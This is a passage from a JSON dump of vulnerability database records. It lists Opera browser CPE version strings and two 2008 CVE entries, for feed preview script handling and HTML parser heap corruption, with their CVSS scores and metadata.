"cpe:2.3:a:opera:opera_browser:5.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.61:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:4.01:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:3.60:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.11:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:3.50:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:8.52:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.50:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:2.10:beta3:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:2.10:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.60:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:8.02:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.22:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:4.00:beta3:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.01:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:8.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.50:beta1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.60:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.0:tp1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.54:update2:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:5.0:beta6:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:4.00:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.25:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.10:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.23:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.54:update1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.01:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:5.11:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.10:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.52:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:5.0:beta7:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.04:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:3.61:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:8.50:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.20:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.20:beta1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.12:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.02:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.27:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.0:tp2:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:4.00:beta2:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.06:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.02:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.51:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.20:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.23:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:8.53:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:8.01:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:4.00:beta6:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:3.51:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.22:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.0:beta1_v2:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.26:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:8.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.1:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.05:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.50:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:2.10:beta2:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.60:beta1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:4.00:beta4:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:5.12:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:5.0:beta5:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:3.10:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.21:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:5.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.10:beta1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.50:beta1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.02:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:2.12:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.24:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.50:beta2:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:2.00:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:5.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.20:beta7:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:3.00:beta:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.51:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:4.02:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.53:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.11:beta2:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.03:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:2.10:beta1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.54:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.11:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:4.00:beta5:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.03:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.1:beta1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.52:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.01:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:5.02:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:5.0:beta8:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:8.51:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:3.00:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.0:tp3:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:8.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:3.62:beta:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:28:27", "description": "Opera before 9.63 does not block unspecified \"scripted URLs\" during the feed preview, which allows remote attackers to read existing subscriptions and force subscriptions to arbitrary feed URLs.", "edition": 6, "cvss3": {}, "published": "2008-12-19T16:30:00", "title": "CVE-2008-5681", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-5681"], "modified": "2012-06-07T17:24:00", "cpe": ["cpe:/a:opera:opera_browser:9.61", "cpe:/a:opera:opera_browser:8.53", "cpe:/a:opera:opera_browser:3.21", "cpe:/a:opera:opera_browser:3.62", "cpe:/a:opera:opera_browser:7.21", "cpe:/a:opera:opera_browser:6.1", "cpe:/a:opera:opera_browser:7.50", "cpe:/a:opera:opera_browser:9.27", "cpe:/a:opera:opera_browser:7.03", "cpe:/a:opera:opera_browser:5.11", "cpe:/a:opera:opera_browser:8.0", "cpe:/a:opera:opera_browser:1.00", "cpe:/a:opera:opera_browser:8.54", "cpe:/a:opera:opera_browser:7.51", "cpe:/a:opera:opera_browser:7.22", "cpe:/a:opera:opera_browser:8.50", "cpe:/a:opera:opera_browser:6.06", "cpe:/a:opera:opera_browser:9.0", "cpe:/a:opera:opera_browser:9.20", "cpe:/a:opera:opera_browser:7.20", "cpe:/a:opera:opera_browser:7.0", "cpe:/a:opera:opera_browser:3.51", "cpe:/a:opera:opera_browser:2.00", "cpe:/a:opera:opera_browser:3.50", "cpe:/a:opera:opera_browser:9.26", "cpe:/a:opera:opera_browser:2.10", "cpe:/a:opera:opera_browser:2.12", "cpe:/a:opera:opera_browser:4.02", "cpe:/a:opera:opera_browser:6.11", "cpe:/a:opera:opera_browser:9.23", "cpe:/a:opera:opera_browser:8.02", "cpe:/a:opera:opera_browser:6.02", "cpe:/a:opera:opera_browser:5.02", "cpe:/a:opera:opera_browser:5.0", "cpe:/a:opera:opera_browser:8.51", "cpe:/a:opera:opera_browser:8.01", "cpe:/a:opera:opera_browser:9.25", "cpe:/a:opera:opera_browser:6.04", "cpe:/a:opera:opera_browser:9.50", "cpe:/a:opera:opera_browser:4.01", "cpe:/a:opera:opera_browser:9.60", "cpe:/a:opera:opera_browser:6.01", "cpe:/a:opera:opera_browser:9.21", "cpe:/a:opera:opera_browser:6.03", "cpe:/a:opera:opera_browser:3.00", "cpe:/a:opera:opera_browser:9.52", "cpe:/a:opera:opera_browser:9.12", "cpe:/a:opera:opera_browser:9.24", "cpe:/a:opera:opera_browser:7.52", "cpe:/a:opera:opera_browser:7.54", "cpe:/a:opera:opera_browser:7.60", "cpe:/a:opera:opera_browser:9.62", "cpe:/a:opera:opera_browser:6.12", "cpe:/a:opera:opera_browser:9.51", "cpe:/a:opera:opera_browser:6.0", "cpe:/a:opera:opera_browser:7.10", "cpe:/a:opera:opera_browser:7.53", "cpe:/a:opera:opera_browser:3.60", "cpe:/a:opera:opera_browser:5.10", "cpe:/a:opera:opera_browser:5.12", "cpe:/a:opera:opera_browser:7.01", "cpe:/a:opera:opera_browser:9.02", "cpe:/a:opera:opera_browser:9.22", "cpe:/a:opera:opera_browser:3.10", "cpe:/a:opera:opera_browser:8.52", "cpe:/a:opera:opera_browser:3.61", "cpe:/a:opera:opera_browser:9.10", "cpe:/a:opera:opera_browser:9.01", "cpe:/a:opera:opera_browser:4.00", "cpe:/a:opera:opera_browser:6.05", "cpe:/a:opera:opera_browser:7.02", "cpe:/a:opera:opera_browser:7.11", "cpe:/a:opera:opera_browser:7.23"], "id": "CVE-2008-5681", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5681", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:opera:opera_browser:1.00:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:8.54:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.12:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.21:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:3.21:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:3.62:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:5.10:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.62:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:5.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.61:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:4.01:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:3.60:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.11:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:3.50:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:8.52:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.50:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:2.10:beta3:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:2.10:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.60:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:8.02:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.22:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:4.00:beta3:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.01:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:8.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.50:beta1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.60:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.0:tp1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.54:update2:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:5.0:beta6:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:4.00:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.25:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.10:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.23:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.54:update1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.01:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:5.11:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.10:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.52:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:5.0:beta7:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.04:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:3.61:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:8.50:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.20:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.20:beta1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.12:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.02:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.27:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.0:tp2:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:4.00:beta2:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.06:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.02:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.51:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.20:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.23:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:8.53:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:8.01:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:4.00:beta6:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:3.51:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.22:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.0:beta1_v2:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.26:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:8.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.1:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.05:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.50:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:2.10:beta2:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.60:beta1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:4.00:beta4:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:5.12:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:5.0:beta5:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:3.10:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.21:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:5.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.10:beta1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.50:beta1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.02:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:2.12:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.24:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.50:beta2:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:2.00:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:5.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.20:beta7:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:3.00:beta:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.51:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:4.02:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.53:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.11:beta2:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.03:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:2.10:beta1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.54:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.11:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:4.00:beta5:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.03:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.1:beta1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.52:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.01:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:5.02:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:5.0:beta8:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:8.51:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:3.00:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.0:tp3:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:8.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:3.62:beta:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:28:27", "description": "The HTML parsing engine in Opera before 9.63 allows remote attackers to execute arbitrary code via crafted web pages that trigger an invalid pointer calculation and heap corruption.", "edition": 7, "cvss3": {}, "published": "2008-12-19T16:30:00", "title": "CVE-2008-5679", "type": "cve", "cwe": ["CWE-399"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": true, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-5679"], "modified": "2018-10-11T20:56:00", "cpe": ["cpe:/a:opera:opera:7.20", "cpe:/a:opera:opera:5.3", "cpe:/a:opera:opera:9.62", "cpe:/a:opera:opera:9.20", "cpe:/a:opera:opera:8.52", "cpe:/a:opera:opera:7.22", "cpe:/a:opera:opera:9.51", "cpe:/a:opera:opera:8.54", "cpe:/a:opera:opera:5.10", "cpe:/a:opera:opera:9.23", "cpe:/a:opera:opera:9.25", "cpe:/a:opera:opera:7.23", "cpe:/a:opera:opera:6.02", "cpe:/a:opera:opera:5..10", "cpe:/a:opera:opera:5.12", "cpe:/a:opera:opera:8.02", "cpe:/a:opera:opera:6.1", "cpe:/a:opera:opera:5.2", "cpe:/a:opera:opera:5.6", "cpe:/a:opera:opera:5.0", "cpe:/a:opera:opera:9.24", "cpe:/a:opera:opera:9.61", "cpe:/a:opera:opera:7", "cpe:/a:opera:opera:7.21", "cpe:/a:opera:opera:7.11", "cpe:/a:opera:opera:6.11", "cpe:/a:opera:opera:9.50", "cpe:/a:opera:opera:5.5", "cpe:/a:opera:opera:9.6", "cpe:/a:opera:opera:8.0", "cpe:/a:opera:opera:7.54", "cpe:/a:opera:opera:7.02", "cpe:/a:opera:opera:9.60", "cpe:/a:opera:opera:7.50", "cpe:/a:opera:opera:9.26", "cpe:/a:opera:opera:5.02", "cpe:/a:opera:opera:7.52", "cpe:/a:opera:opera:6", "cpe:/a:opera:opera:6.03", "cpe:/a:opera:opera:5.8", "cpe:/a:opera:opera:6.05", "cpe:/a:opera:opera:6.01", "cpe:/a:opera:opera:9.10", "cpe:/a:opera:opera:6.04", "cpe:/a:opera:opera:7.03", "cpe:/a:opera:opera:5.11", "cpe:/a:opera:opera:8.01", "cpe:/a:opera:opera:7.01", "cpe:/a:opera:opera:8.51", "cpe:/a:opera:opera:6.06", "cpe:/a:opera:opera:7.0", "cpe:/a:opera:opera:5.4", "cpe:/a:opera:opera:5.1", "cpe:/a:opera:opera:9.22", "cpe:/a:opera:opera:9.52", "cpe:/a:opera:opera:8.53", "cpe:/a:opera:opera:5.7", "cpe:/a:opera:opera:7.53", "cpe:/a:opera:opera:9.27", "cpe:/a:opera:opera:9.0", "cpe:/a:opera:opera:7.51", "cpe:/a:opera:opera:9.02", "cpe:/a:opera:opera:5.9", "cpe:/a:opera:opera:6.0", "cpe:/a:opera:opera:7.10", "cpe:/a:opera:opera:9.21", "cpe:/a:opera:opera:6.12", "cpe:/a:opera:opera:9.01", "cpe:/a:opera:opera:*", "cpe:/a:opera:opera:8.50"], "id": "CVE-2008-5679", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5679", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:opera:opera:5.0:beta_5:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:9.60:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:9.21:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:9.23:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:5.0:beta_7:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:7.50:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:7:beta_1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:5.11:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:9.20:beta_1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:8.50:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:9.50:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:9.24:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:9.0:beta_1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:7.0:beta_2:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:7.23:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:9.10:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:6:beta_1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:5.3:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:5.2:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:6.03:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:8.02:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:5.0:beta_2:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:9.26:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:9.27:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:7.10:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:6.11:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:7.0:beta_1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:8.0:beta_1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:6.02:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:9.61:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:5.1:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:7.54:update_1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:7.50:beta_1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:5.7:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:6.0:beta_2:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:8.51:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:5..10:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:9.22:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:9.50:beta_1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:9.60:beta_1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:9.50:beta_2:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:9.52:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:5.5:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:9.20:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:5.12:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:9.02:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:7.20:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:6.01:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:5.6:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:7.22:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:8.53:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:6.0:beta_3:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:5.0:beta_4:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:9.62:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:7.03:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:*:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:9.6:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:5.0:beta_3:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:5.0:beta_8:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:6.12:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:9.51:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:5.9:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:7.01:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:8.01:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:7.52:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera:6.1:*:*:*:*:*:*:*", 